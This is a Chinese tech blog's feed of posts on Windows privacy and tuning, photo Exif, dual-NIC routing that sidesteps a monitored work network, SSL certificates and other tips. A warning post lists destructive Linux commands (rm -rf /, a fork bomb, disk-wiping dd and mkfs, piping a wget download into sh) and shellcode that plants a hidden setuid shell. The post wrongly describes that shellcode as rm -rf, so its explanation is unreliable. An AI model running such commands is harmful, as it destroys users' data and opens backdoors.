技术乐园 – 嗨软 https://ihacksoft.com/archive 分享最好用的常用软件 Tue, 22 Nov 2022 02:41:09 +0000 zh-CN hourly 1 https://wordpress.org/?v=4.9.26 Windows 11/10 隐私数据泄漏的几个要点及保护方法 https://ihacksoft.com/archive/1463.html https://ihacksoft.com/archive/1463.html#respond Mon, 07 Mar 2022 01:19:31 +0000 https://ihacksoft.com/?p=2201   微软新的操作系统 Windows 11/10 有很多用户难以掌控的问题,它具有强制更新和缺乏数据保护措施的系统功能。很多用户对Windows 11 或 Windoww 10 都有一种感觉,那就是这个系统有太多不受控制的地方了。当用户升级到 Windows 11/10 后并没有感受到多少安全感,相反,许多用户对于个人数据的安全性心存疑虑:Windows 10 /11 比以往任何一个Windows收集的用户信息都多。而且该系统许多功能是不受用户控制的:收集数据的功能默认开启、强制更新系统、在锁定屏幕上显示广告。不过,我们可以驯服它。以下是手工设置方法,如果嫌麻烦,可以使用上周推荐的WPD 绿色中文版,更强大、更全面。

Windows 11/10 隐私保护

关闭广告追踪

在浏览网页的过程中,会“泄露”很多数据,比如个人的兴趣、爱好、购物习惯甚至个人姓名和身份证等个人隐私,这些数据会逐渐形成个人的兴趣档案,很多公司都会利用这些兴趣档案,推送各式样的广告。实际上,Windows10便是浏览网页和使用应用程序来收集个人信息的。

因此,只有关闭广告,才能杜绝浏览数据信息的泄露,具体方法如下,打开Windows10的设置按钮,转到“隐私”-“常规”,在菜单栏里找到“更改隐私选项”,将第一个进行关闭,这样Windows10便不会推送定制化的广告。

不过为了进一步保证个人隐私的安全,还需要进入Microsoft賬户进行设置。具体方法是,在登陆完毕后,页面顶部会出现“查看你感兴趣的广告”,将其设置到“关闭”状态,然后往下找到“在浏览器中查看个性化广告”部分,同样进行关闭,确保浏览器不会收集个人隐私信息。

关闭位置信息

Windows10具备读取位置的权限,所以不管电脑被带到哪里,都会获取当地的天气、附近的餐馆和加油站等,这项功能也是可以关闭的。具体方法是启动设置,找到“隐私”-“位置”,在“允许访问此设备上的位置”下,单击“更改”,然后关闭。

不过没有必要关闭所有的位置权限,只需关闭部分的位置信息,例如某些不太可能用到位置信息的应用。还是按照上述找到位置信息的方法,向下浏览,逐个关闭不需要获取位置信息的应用。当然,在关闭位置信息时,Windows10系统依旧会保留过去的位置记录,这时可以转到“隐私控制面板”,找到“位置部分”,然后单击清除位置活动,删除全部或部分位置记录。

关闭时间轴

在使用笔记本或台式机的过程中,时间轴扮演了很重要的角色,它可以查询历史活动信息,方便在台式机、笔记本电脑之间自由切换。但如果担心隐私泄露,可以将其关闭。具体方法是打开设置选项,找到“设置”-“隐私”-““活动历史记录”,然后取消勾选“在此设备上存储我的活动历史记录”和“将我的活动历史记录发给Microsoft”。

当关闭时间轴时,Windows10依旧保留着关于活动的历史信息,想要彻底清除这些历史信息的话,需要进入Microsoft账户活动数据,在这里清除相关数据。

暂停使用Cortana

实际上Cortana是有用的数字助理,但为了工作可能获取位置信息,比如工作地点、上下班时间以及行程路线,如果担心自己的隐私泄露,那么可以选择限制Cortana。具体方法如下,单击Windows搜索框右侧的Cortana图标,再单击出现在屏幕的图标,然后对Cortana进行限制。点击“撤销权限并退出”,将退出Cortana,同时该数字助手不会跟踪位置信息,也不会同日历、电子邮件以及其他应用建立联系。

如果想进一步清除Cortana的记录和个人数据的话,需要登录Cortana,并执行删除等一系列相应的操作。

设置本地账户

Windows10使用起来很便捷的一点在于Microsoft账户的采用,设置登陆Microsoft账户之后,不管使用什么样的电脑,只要登陆Microsoft账户,便可以同步一些历史信息。但是很多用户担心这个过程导致信息的泄露,因此想要将Microsoft账户转为本地账户。

这其实设置起来很简单,打开设置选项后,转到“账户”选项,选择使用本地账户登录,并按照使用向导创建和使用本地账户即可。需要注意的是,在使用本地账户之后,将没有办法使用Microsoft的OneDrive存储或从Microsoft Store下载并安装付费应用程序。

更改应用权限

Windows10操作系统很有可能通过应用程序获取一些隐私信息,比如相机、麦克风、位置、图片和视频,可以通过一些设置,来更改每个应用程序的访问权限。具体方法是,找到“设置”-“应用”,在应用和功能下方,将看到已经安装的应用列表,找到具体的程序,点击高级选项,然后通过打开或关闭来设置应用程序的权限。

还有一种更改程序权限的方法,找到“设置”-“隐私”之后,在页面左侧的“应用权限”下将看到Windows的所有硬件,对其进行修改即可。

控制和删除诊断数据

在使用Windows10的过程中,Windows将收集有关硬件以和Windows的操作数据,按照微软的说法就是诊断数据。可以通过设置进行修改,找到“设置”-“隐私-“诊断反馈”之后,然后在“所需的诊断数据”和“可选的诊断数据”中进行选择。要注意的是,如果担心自己的隐私可以选择“所需的诊断数据”,切勿选择“可选的诊断数据”。

此外,尚需执行其他操作,找到“量身定制的体验”部分,将其关闭,这不会影响Microsoft手机的数据,但会关闭基于该信息的定向广告和提示。然后再找到“删除诊断数据”部分,单击“删除”,这会删除Microsoft手机的所有诊断数据。

使用微软隐私设置

前文提到,很多涉及到隐私的事宜都是通过微软账户进行设置的,因此微软安全里其实有很多实用的工具,比如删除浏览历史记录、删除位置活动、媒体活动等。

]]>
https://ihacksoft.com/archive/1463.html/feed 0
高手总结的 Windows 11/10 系统优化技巧 https://ihacksoft.com/archive/1461.html https://ihacksoft.com/archive/1461.html#respond Fri, 04 Mar 2022 03:16:48 +0000 https://ihacksoft.com/?p=2199   试用了几天全新 Windows 11 系统,说实话,不是特别习惯,尤其是改进的右键菜单。其它方面和 Windows 10 体验差不多,因为我平时用的是 Windows 10 LTSC,Win11 运行速度明显感觉慢一些,当然随着不断的更新完善,相信会越来越好。本文转载了一些高手总结的系统优化的技术技巧,适用于 Windows 11/10。

Windows 11系统优化技巧

注册Microsoft账户

  对于一台全新的 Windows 11 电脑来说,注册一个Microsoft账户是一件十分重要的事。与传统的单机版系统不同,Windows 11 的Microsoft账户能为你提供很多不一样的体验。比如可以同步你的习惯,无论桌面还是个性化设置,都能在所登录电脑间自动穿行。办公室做的日程,回家后也能收到通知,避免遗漏重要事务。无论灵机一动还是需要紧急处理,OneDrive的文件无缝衔接总能让你游刃有余。甚至还可以自动同步密码与剪贴板,家里复制的内容,回到办公室依旧可以粘贴。

  那么想要实现这一切该如何做呢?很简单,打开设置→账户→账户信息,点击里面的“改用Microsoft账户登录”就可以了。

夜间模式

  如果有晚上办公的习惯,不妨试一试接下来这项设置。“夜间模式”是Windows 11/10里一项屏幕去蓝光功能,可以在规定的时间内自动切换到低蓝光状态。打开设置一系统一显示,点击右侧的“夜间模式设置”,即可看到这个面板。其中滑杆条负责去蓝光强度,“计划”负责该模式的自动启闭时间,可以让它定时开启,也可以随着日出日落自动切换。

关闭登录验证(办公机慎用)

  作为系统安全的重要组成部分,Windows 11/10的每一次开机都是需要密码的,特别是当你开启了Microsoft账户登录后,这一项几乎是绕不开的。不过对于家用电脑来说,这样的设置或许真的有些多余,如果你想关闭这项功能,可以试一试下面这个操作。

  打开设置→账户→登录选项,取消“需要使用Windows Hello登录Microsoft账户”下面的复选框。按动Win+R,输入netplwiz。取消“要使用本计算机,用户必须输入用户名和密码”,点击确定。最后根据屏幕提示,再次确认一遍密码就可以了。

文件内容预览

  MacOS的空格预览令很多人心醉,在Windows 11/10中也有一项类似的设计。打开资源管理器,点击查看→窗格→预览窗格,便打开了文件预览功能。Windows 11/10的文件预览支持图片与文档,但对音乐、视频无效。

组件升级

  与之前的Windows系统不同,Windows 11/10采用的是系統与应用分开设计的理念。因此当你拿到一台新电脑后,首先要做的,就是进入应用商店对系统内置组件进行升级。

  升级过程并不复杂,打开应用商店,点击右上角“…”→“下载和更新”,进入更新页面后,然后再点击“全部更新”即可。此外也可以通过“…”→“设置”开启商店自动更新功能,这样就不用再一遍遍地手工检查了。

剪贴板增强

  除了传统的Ctrl+C/Ctrl+V之外,Windows 11/10还引入了另一项增强型剪贴板。打开设置→系统→剪贴板,勾选“剪贴板历史记录”,就开启了这项功能。与传统的剪贴板不同,增强型剪贴板不仅可以查看剪贴历史(Win+V),还支持跨设备剪贴板同步。打开跨设备同步一系统一体验共享一跨设备共享2项开关后,在A机上复制的内容,就能直接在B机上Ctrl+V粘贴了。

Caps Lock声音提醒

  误按Caps Lock键会引发很多麻烦,其实在Windows 11/10,只要打开设置→轻松使用→键盘,就能开启一项声音提醒功能。每当Caps Lock被按下后,Windows 11/10就会自动发出一声提醒。除了Caps Lock以外,这项功能也支持Num Lock、Scroll Lock等切换键,感兴趣的话快去试一试吧。

自启动清理

  如手机一样,如果Windows 11/10中的启动软件太多,也会严重影响速度,这时就需要对启动项进行清理了。

  打开设置→应用→启动,可以看到当前系统中的所有启动项目。除了直接关闭以外,还可以点击左上角“排序依据”,根据影响程度大小,快速找出拖慢电脑的“罪魁祸首”!

安装PowerToys

  PowerToys是微软出品的一款系统辅助软件,能够解决Windows 11/10的很多痛点。比如它自带取色器,可以自由吸取屏幕上任何一个点位的色值;内置搜索框,提供了Windows 搜索,程序打开,文件夹定位,电脑重启,数学计算等诸多快捷功能;支持窗口自定义布局,特别是带鱼屏用户,能够大幅提高使用效率;它还内置了键盘映射器,对于公司是Mac家里是Windows 11/10的用户来说,可以迅速统一操作习惯。

文件历史记录

  文件历史记录可以实现两大功能,一是文件误删除后的恢复,二是恢复文件的不同时间版本。开启方法在设置→更新和安全→备份→自动备份我的文件,将要备份的文件夹添加进列表,即可自动开启备份。文件历史记录采用的是增量备份机制,日常使用对系统和存储的压力都不大。

  恢复环节同样也分2种情况:一是文件被删除后的恢复,二是恢复不同时间的文件版本。第一项比较简单,直接在搜索栏中输入“文件历史记录”,再根据时间找到被删除前的文件夹位置即可。第二项可直接在文件上右击鼠标,选择“还原以前的版本”,就能恢复当前文件的某个时间版本。

动态锁

  动态锁是Windows 11/10里一项安全保护机制,开启后,当离开电脑一段距离,系统就会自动锁屏。

  首先打开电脑和手机的蓝牙功能,配对并连接好。接下来进入设置→账户→登录选项,勾选“允许Windows在你离开时自动锁定设备”。设置完成后,当你的手机距离电脑过远时,就会自动触发锁屏,特别适合办公室的电脑使用。

就近共享

  如何在台式机与笔记本间快速传递文件?

  除了U盘以外,还可以试试这一项“就近共享”。“就近共享”是Windows 11/10里一项近场传输功能,通过蓝牙与WiFi配合,可以在不同Windows 11/10电脑间实现快速稳定的数据链接。具体方法是:找到设置,打开系统→体验共享→就近共享。接下来通过右击文件选择共享→附近的电脑。连接的速度取决于设备远近以及相关连接质量,但总体看还是不错的。同时“就近共享”也没有明显的文件大小限制,日常使用十分方便。

搜索范围

  Windows 11/10的搜索常被人诟病为“弱鸡”,特别是在和Everything、Listary这样的优秀搜索工具对比时,差距更加明显。不过自带搜索也有一个好处,那就是与系统的配合更良好。如果不喜欢Everything这样的第三方工具,不妨试着打开Windows1。设置→搜索→搜索Windows,将里面的“经典”切换为“增强”。首次打开后Windows 11/10会花费一点点时间进行索引,但之后的搜索效果就会好上很多。

勒索防护

  勒索病毒这几年很火,主要原因是它破坏的全部是用户文件,且没办法解密。在Windows 11/10中有一项勒索病毒防护功能,只要点击搜索栏,输入“勒索”二字,就能开启防护。当然防范归防范,预防才是关键。不随意打开来历不明的软件,及时修补漏洞,进行数据备份,都能有效地杜绝勒索病毒的攻击。

Windows 11系统优化技巧

硬盘自动优化

  无论固态硬盘还是普通硬盘,想让电脑常用常新,定期维护都是少不了的。除了不向C盘和桌面放置过多文件外,以下2项设置也建议开启。

  打开设置→系统→存储,开启“存储感知”,可让Windows 11/10定期清理磁盘垃圾。点击“优化驱动器”,可让系统自动完成碎片整理(普通磁盘)或TRIM回收(固态硬盘)。

关闭后台应用

  和手机系统一样,WindowslO在正常使用中也会出现很多后台应用。除了天气、应用商店、OneNote等个别需要即时联网的应用外,其余绝大多数都可以关闭,位置就在:设置→隐私→后台应用。

  除了后台应用外,也可以通过在搜索栏中输入service来优化系统服务。其中Connected User Experiences and Telemetry,Diagnostic Execution Service,Diagnostic Policy Service,Diagnostic Service Host,Diagnostic System Host是Windows 11/10的诊断服务,用处不大,关闭后能明显提高系统响应速度,其他服务则可以根据自己的需要调整。

]]>
https://ihacksoft.com/archive/1461.html/feed 0
手机中的照片会泄露个人隐私?附解决方法 https://ihacksoft.com/archive/1457.html https://ihacksoft.com/archive/1457.html#respond Tue, 01 Mar 2022 01:27:25 +0000 https://ihacksoft.com/?p=2195   不管是手机还是相机拍摄的照片,其实自带了非常详细的Exif信息。这些照片中的 Exif 泄露了照片拍摄的位置,根据Exif中的位置和经纬度信息,很容易就可以得知拍摄位置。所以,如果你把拍摄的照片随意传播给他人,那么你的位置信息也可以轻松被泄漏。当然,不仅仅是位置信息。

  Exif中包含了拍摄设备、设备生产厂家、设备型号、曝光参数、拍摄时间、拍摄地点、定位信息、分辨率和像素、感光度、曝光时间、镜头光圈、光源、GPS信息等参数,通过读取这些参数,我们就可以轻松得知到照片的拍摄信息了。

  既然我们知道了照片Exif信息中包含的这些信息可以泄露我们个人的信息,那么有什么办法可以修改照片的Exif信息吗?当然是有的,分PC端和手机端。

删除Exif信息

  PC端:鼠标右键点击这些照片-属性-详细信息-删除属性和个人信息,在这里选中需要删除的Exif信息。
  手机端:请在应用市场中安装可以支持修改图片Exif信息的应用软件。

]]>
https://ihacksoft.com/archive/1457.html/feed 0
双网卡配置内外网同时上网超详细教程 https://ihacksoft.com/archive/1449.html https://ihacksoft.com/archive/1449.html#respond Fri, 18 Feb 2022 08:38:49 +0000 https://ihacksoft.com/?p=2187   单位的电脑默认使用的是内部网络,因为有诸多限制并有相关监控,用着很不爽,我就给自己的台式机安装了一块无线网卡。这里要提一下,USB 无线网卡的速度太慢了,100M的带宽,测试了两款速度都只有20Mbps左右,推荐使用 PCIE接口的无线网卡。这样一来,无线网卡用于上外网,有线网卡则继续连接内网。但是怎么让他们同时工作呢?就是有线的自动连接内网,无线的自动连接外网。这里就不得不做路由了,很多人以为只有路由器或三层交换机可以做路由,其实不然,Windows 系统同样可以做路由。

双网卡配置内外网

  我的要求很简单,所以只需一条命令即可实现。至于为什么下面是两条命令,因为我有两个内网需要做路由。成功后会提示操作完成:

route add 10.0.0.0 mask 255.0.0.0 10.43.49.254
route add 172.23.0.0 mask 255.255.0.0 10.43.49.254

  关于双网卡实现内外网同时访问的文章太多了,看得眼花缭乱,这里整理了一篇较详细完整的,可以学习下。

一、Route命令简介

可以在cmd控制台(按Win+R后,在运行中输入cmd),输入route print查看帮助信息。

二、Route常用命令介绍

1、查看路由表 route print

要查看完整路由表,请键入:route print
要查看IPV4路由表,请键入:route print -4
要查看IPV6路由表,请键入:route print -6
要查看IP路由表中以 10. 开始的路由,请键入:route print 10.*

2、添加路由 route add

要添加默认网关地址为 192.168.1.1 的默认路由,请键入:
route add 0.0.0.0 mask 0.0.0.0 192.168.1.1
要添加默认网关地址为 192.168.1.1 的默认永久路由,请键入:
route add 0.0.0.0 mask 0.0.0.0 192.168.1.1 -p
要添加目标为 10.2.2.100,子网掩码为 255.255.0.0,下一个跃点地址为 10.2.2.1 的路由,请键入:
route add 10.2.2.100 mask 255.255.0.0 10.2.2.1
要添加目标为 10.2.2.100,子网掩码为 255.255.0.0,下一个跃点地址为 10.2.2.1 的永久路由,请键入:
route add 10.2.2.100 mask 255.255.0.0 10.2.2.1 -p
要添加目标网段为 10.2.2.0,子网掩码为 255.255.0.0,下一个跃点地址为 10.2.2.1 的永久路由,请键入:
route add 10.2.2.0 mask 255.255.0.0 10.2.2.1 -p

3、删除路由 route delete

要删除目标为 10.2.2.100,子网掩码为 255.255.0.0 的路由,请键入:
route delete 10.2.2.100 mask 255.255.0.0
要删除目标为 10.2.2.100的所有路由,请键入:
route delete 10.2.2.100
要删除目标为 10.2.2.100,子网掩码为 255.255.0.0 的路由,请键入:
route delete 10.2.2.100 mask 255.255.0.0
要删除 IP 路由表中以 10. 开始的所有路由,请键入:
route delete 10.*
要删除默认路由,请键入:
route delete 0.0.0.0

4、改变路由 route change

要将目标为 10.2.2.100,子网掩码为 255.255.0.0 的路由的下一个跃点地址由 10.2.2.1 更改为 10.2.3.1,请键入:
route change 10.2.2.100 mask 255.255.0.0 10.2.3.1

三、配置示例

1、前置条件:
  两张网卡,一张用于内网,一张用于上外网。假如内网网关10.2.2.1-----外网网关192.168.1.1。需要知道内网需要访问的网页或者软件服务器IP,这里把内网需要访问的IP认定为10.2.2.100。

2、具体配置示例:
第一种情况:双网卡内外网都是静态分配的
  电脑内网卡设置为IP地址:10.2.2.115 子网掩码:255.255.255.0 网关留空。外网设置为IP地址:192.168.1.2 子网掩码:255.255.255.0 网关:192.168.1.1。

  静态路由只写一条
  route add -p 10.2.2.100 mask 255.255.255.0 10.2.2.1

第二种情况:双网卡内网静态分配,外网自动获取
  电脑内网卡设置为IP地址:10.2.2.115 子网掩码:255.255.255.0 网关留空。外网自动获取。
  静态路由写法
  route add -p 10.2.2.100 mask 255.255.255.0 10.2.2.1

第三种情况:双网卡内网自动获取,外网静态分配
  内网卡自动获取,外网IP设置为IP地址:192.168.1.2 子网掩码:255.255.255.0 网关:192.168.1.1
  现在只写静态路由就不行了。请往下看
  route delete 0.0.0.0
  route add 0.0.0.0 mask 0.0.0.0 192.168.1.1
  route add 10.2.2.100 mask 255.255.255.0 10.2.2.1
  但是呢这个路由都不是永久路由,每次重启或者插拔网卡后都会影响使用,个人建议把这三条命令输入到.bat 文件里面放入到电脑的启动文件夹,这样每次开机都会运行一下这个命令。插拔过网卡后也注意要运行下这三条命令。

第四种情况:双网卡内外网都是自动获取
  内外网ip不进行设置
  静态路由设置方法也是完全同情况三,也需要注意把,命令加到开机启动那
  route delete 0.0.0.0
  route add 0.0.0.0 mask 0.0.0.0 192.168.1.1
  route add 10.2.2.100 mask 255.255.255.0 10.2.2.1
  但是呢这个路由都不是永久路由,每次重启或者插拔网卡后都会影响使用,个人建议把这三条命令输入到.bat 文件里面放入到电脑的启动文件夹,这样每次开机都会运行一下这个命令。插拔过网卡后也注意要运行下这三条命令。

四、特别提醒

1、每次重启或者插拔网卡后,采用自动获取ip方式的,都会生成一条0.0.0.0的默认路由,而这一条路由适用于所有目标网络,所以一般公司配置双网卡采用第二种方式,外网自动获取,内网固定ip形式,这样在重启后,不用重新设置路由,如果在活动路由中存在两条0.0.0.0的路由,则需要把0.0.0.0的路由删除掉,在重新对外网自动获取,否则目标地址无法准确路由,外网无法访问。

2、网络目标可以为一个目标ip(例如10.2.2.100),也可以为一个目标网段(例如10.2.2.0),注意:网络目标为0.0.0.0时,所有没有路由的目标ip全部会走此路由。

3、如果内网需要访问多个网络目标,则在添加多条目标路由。

4、路由匹配原则,采用最大匹配度方式,比如存在网络地址10.2.2.100下一跳为10.2.2.1和网络地址10.2.2.0下一跳为10.2.3.1两条网络路由,如果访问目标网络地址为10.2.2.100,那么选用的路由为10.2.2.100,下一跳为10.2.2.1的路由。

]]>
https://ihacksoft.com/archive/1449.html/feed 0
方正小标宋简体字体下载(3.0+4.0原版) https://ihacksoft.com/archive/1448.html https://ihacksoft.com/archive/1448.html#respond Fri, 18 Feb 2022 08:12:33 +0000 https://ihacksoft.com/?p=2186   早上在拟一个通知文件,根据一贯的要求,正文标题必须为方正小标宋。但是很奇怪,虽然 WPS word 左上角显示的是“方正小标宋简体”,但是字体看起来怪怪的。后来一检查才发现,我电脑里根本没有安装方正小标宋字体,是我用了其它的文档模板才会显示该字体,但因为我电脑没有安装该字体,所以字体看上去非常奇怪。

方正小标宋简体

  于是马上上百度搜寻下载,结果令人失望。搜索了很多个网页,要么打不开,要么下载的是流氓软件,要么跳转到了其它收费页面,居然很难顺利下载到,以前很简单的,难道是因为版权问题不能随意下载了?不管这么多,继续搜寻,终于成功下载到了。

  问题又来了,下载下来两个版本的方正小标宋,以为是同一个,但一看体积大小不同,一个是3.62 MB,另一个是3.85 MB。同样的字体还能有不同的版本?网上也没搜索到相关的区别。后来通过“属性-详细信息”查看才揭开了谜团,原来前者是3.0版本,后者是4.0版本,猜测后者应该是包含了更多了文字。

方正小标宋简体

扩展阅读

  方正公文字库是北京北大方正电子有限公司近年应中办对公文字体的修改意见,为了满足党政机关公文用字体的高要求而专门精修的公文字库产品。字体美观规范、清晰易读,完全保证电子公文共享交流时统一、准确、原版的完美显示效果。全面支持GBK标准,可以极大的减少发生冷僻字的情况,已在中共中央办公厅等党政机关办公行文中使用。

  方正小标宋源自1964年上海印刷技术研究所设计的标题宋,是专门针对小字号标题设计的,长期被广泛用于“红头文件”的标题。相对于方正大标宋,方正小标宋的笔画略细,中宫略为放松,笔画饱满平和,字形端庄稳重,适用于人文类的文字标题。

Note: There is a file embedded within this post, please visit this post to download the file. ]]>
https://ihacksoft.com/archive/1448.html/feed 0
WordPress 文章中植入视频并自动播放的代码 https://ihacksoft.com/archive/1441.html https://ihacksoft.com/archive/1441.html#respond Fri, 11 Feb 2022 08:01:54 +0000 https://ihacksoft.com/?p=2179   今天要在 WordPress 一篇文章中放入一段 MP4 视频,因为文件比较小,才100多K,就想设置让它自动播放。这里我们需要使用 Video 标签,也就是如下代码:

<video src=“你的视频地址 controls=“controls” width=“宽度” height=“高度”></video>

而video标签有一些参数需要你来了解:
autoplay:出现该属性意味着视频在就绪后将自动播放,用法:autoplay=”autoplay”
controls:出现该属性意味着向用户显示控件,如播放按钮等,用法:controls=”controls”
height:设置高度
width:设置宽度
loop:自动重播,用法:loop=”loop”
preload:视频在页面加载时进行加载并预备播放,用法:preload=”auto” – 当页面加载后载入整个视频;preload=”meta” – 当页面加载后只载入元数据;preload=”none” – 当页面加载后不载入视频。注意:若使用了autoplay,则忽略preload
src:要播放视频的url

  最后我使用的代码为:

<div style="text-align: center;"><video src="https://cdn.ihacksoft.com/2022/63.mp4" controls=“controls” autoplay=”autoplay” loop=”loop”></video></div>
]]>
https://ihacksoft.com/archive/1441.html/feed 0
慎用!Linux 10大危险命令 https://ihacksoft.com/archive/1437.html https://ihacksoft.com/archive/1437.html#respond Thu, 10 Feb 2022 02:52:35 +0000 https://ihacksoft.com/?p=2175 rm -rf / #强制删除根目录下所有东西。 > […]]]> rm -rf 命令

该命令可能导致不可恢复的系统崩坏。

> rm -rf /  #强制删除根目录下所有东西。
> rm -rf *  #强制删除当前目录的所有文件。
> rm -rf .  #强制删除当前文件夹及其子文件夹。

执行rm -rf 一定要想半天,搞明白自己在干什么!

fork 炸弹

:() { :|:& };:

不太好理解可以转换成:

bomb()
{
    bomb|bomb&
};
bomb

一旦执行起来,-bash: fork: Cannot allocate memory,会把系统资源消耗殆尽。它会调用自己两次,一次在前台另一次运行在后台。它会反复的执行下去直到系统崩溃。

echo "" > /dev/sda

该操作会将在块设备中的所有数据块替换为命令写入的原始数据,从而导致整个块设备的数据丢失。

mv 文件夹 /dev/null

> mv /etc /dev/null

/dev/null 或 null 设备是一个特殊的文件,所有写入它的数据都会被清除,然后返回写操作成功。但是这个命令并不能阻止数据恢复软件——所以,真正的彻底毁灭,需要采用专用的软件或者手法来完成。

下载的文件立即执行

> wget http://rumenz.com/rumenz.sh -O- | sh

如果rumenz.sh是一个病毒脚本,就完蛋了。下载脚本文件之前要看看里面的内容,有危险的操作就不要执行。

mkfs.ext3 /dev/sdb

这个命令会格式化块设备sdb,在执行这个命令后你的块设备(硬盘驱动器)会被格式化,直接让你的系统达到不可恢复的阶段。

重定向输出到文件

>  > rumenz.txt

这个命令常用来清空文件内容或记录命令输出,执行之前请考虑清楚。

硬盘清零

> dd if=/dev/zero of=/dev/had

这个命令会将整个主硬盘清零。

执行伪装后的命令

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

上面的命令就是rm -rf ,这里的代码是隐藏在十六进制里的,可能会擦除你的根分区,所以看不懂的命令千万不能执行,非要看效果,请在虚拟机中执行。

]]>
https://ihacksoft.com/archive/1437.html/feed 0
SSL 证书免费与收费的区别 https://ihacksoft.com/archive/1435.html https://ihacksoft.com/archive/1435.html#respond Mon, 07 Feb 2022 11:43:31 +0000 https://ihacksoft.com/?p=2173   SSL证书(SSL Certificates)可以说是现在一个网站的标配,如果没有用SSL证书,浏览器上会显示不安全,导致一部分用户以为网站有问题。另外在微信小程序和iOS APP上,提供的API必须要用HTTS协议,否则不允许上架,所以掌握好SSL证书的配置是一个后端开发必备的技能。

  在阿里云上,提供了每年可以申请一次的免费SSL证书,对于一些个人站点或者小公司的网站来说,确实是一个不错的选择。

免费的SSL证书和付费的有什么区别?

  可能有的人会问勇哥,收费版的SSL证书和免费版的证书有什么区别?首先说下他们的相同点。

1. 都是由信任的CA机构签发的。
2. 都是有一定的加密算法,能保证数据安全传输的。

  首先我们要知道,任何一个人,都可以给自己甚至别人签发SSL证书。但是这个世界上只有那么几家公司(比如Digicert(原Symantec,已更名)、GeoTrust以及TrustAsia,甚至还有一些国产公司)被权威机构所认可,他们的CA根证书被集成到操作系统中了,只有CA根证书被集成到操作系统中,这个CA根证书下的子证书才能被浏览器认为是安全的。

  这里说个真实的小故事,大家应该用过12306网站买票,在之前打开http://12306.cn网站的时候,浏览器会显示此网站不安全,在地址栏中显示一个红叉,甚至在Chrome中整个页面显示一个警告性质的红色,让人以为打开了一个钓鱼网站。其实原因很简单,就是当初12306用的根证书是他自己给自己颁发的,不是权威机构所认可的,操作系统中不存在这个根证书,导致曾经一段时间,用户体验相当差。如下图:

SSL 证书免费与收费

  当然,现在的12306已经改成了DiGiCert CN签发的证书了,用户体验上好了很多,那个恶心的叉叉也不见了!

  再回到正题,收费版的SSL证书和免费版的证书有什么区别,主要体现在以下几点:

  1. 品牌不一样: 像DigiCert这样的公司,是全世界最被认可的公司,他们签发的证书,可激活互联网最受信任的诺顿安全签章,价格肯定会有所差别了。

  2. 身份审核不一样: 免费的CA证书只会验证域名信息,由系统自动签发完成,签发速度几乎是立即完成。付费的CA证书会对验证网站的真实性做严格的验证,可以这样说,有付费SSL证书签发的网站,几乎是不可能有问题的,因此可信度比较高,但是签发周期也比较长,一般要3-15个工作日。

  3. 安全保险不一样: 付费的CA证书大多都有保险,最高可享受175万美元的保额,也就是说你的网站在使用SSL证书通信期间,被黑客攻击了,那么是可以享受保险的。但是免费的CA证书是没有的。

  4. 签发的域名不一样: 付费的CA整数一般都可以签发好几个域名,但是免费的CA证书只能签发一个域名。

  当然还有更多其他方面的不同,比如付费的CA证书加密算法方面会做得更加优秀等。但是如果只是一个个人站点,或者是小公司的网站,我们可以先用免费的CA证书来过渡。毕竟买一个付费的CA证书,最贵的一年也要1W多,少的也要1000多。

  以下来自又拍云的解释:

  免费SSL证书即为免费型的 DV SSL 证书,可以保护一个完整的域名,不支持通配符。免费 SSL 证书只需验证域名信息,签发速度非常快,几分钟即可签发。又拍云提供的 Let’s Encrypt DV SSL 证书,不但免费,甚至可以做到自动续期,节省人工成本。

  付费 SSL 证书主要分为付费的 DV SSL 证书、企业型 OV SSL 证书和增强型 EV SSL 证书三大类。OV SSL 证书、EV SSL 证书证书对申请者都需要做严格的身份审核验证,需要提供可信身份证明。签发时间一般在 3 至 15 个工作日。相比 DV SSL 证书,OV SSL 证书、EV SSL 证书需要严格的身份审核,其中涉及的资料包括申请人授权书、营业执照、组织机构代码证等等的重要信息。

  身份的认证是为了让用户对网站的真实进行验证,帮助他们去辨别网站的真实身份,免受中间的攻击或者误入钓鱼网站,建立起用户对网站真实性的信任。其中EV SSL 证书可以更直观地让用户体验到安全加密,其特有的绿色地址栏可以直接展现给用户,安全锁及组织机构名称的体现可以让用户更容易的识别该网站的真实性与安全性。

  免费证书并没有什么不好,和付费证书相比,更多的是他们适用于不同的场景。

免费 SSL 证书

  免费 DV 证书对于个人博客、小微企业、API 服务等的服务,可以节省一笔不菲的开支,并且免费 DV 证书足以满足基本的加密要求,提高用户对网站的信任,以及搜索引擎对SEO的优化。当然如果在有经济条件的情况下,付费 SSL 证书不失为一种更好的选择;

付费 SSL 证书

  对于中大型企业网站、金融平台和政府机关等付费的 OV、EV 证书则更加适用。付费 SSL 证书对信息传输过程有更高的加密验证,还可以通过 SSL 证书来彰显品牌形象,为消费者塑造更加可靠的形象。

]]>
https://ihacksoft.com/archive/1435.html/feed 0
终于找到了 Everything 文件搜索不到的真正原因! https://ihacksoft.com/archive/1434.html https://ihacksoft.com/archive/1434.html#respond Mon, 07 Feb 2022 03:38:49 +0000 https://ihacksoft.com/?p=2172   今天打开 Everything 搜索一个文件夹,发现结果为空。一直很信任 Everything,连它都搜索不到,那估计是什么时候不小心给误删了,郁闷了好一会。结果后面发现该文件夹居然是存在的!那为什么 Everything 没有搜索到呢?

  可能是索引问题,于是打开工具->选项,左侧找"索引",点击里面的"强制重建"。很多类似的问题可以通过重建索引解决,但这次没任何效果,说明原因并不在此。

  后来通过仔细观察终于找到了真正的原因!是因为“搜索”下面勾选了“全字匹配”,所以才搜索不到,去掉试试,如下图:

Everything

]]>
https://ihacksoft.com/archive/1434.html/feed 0
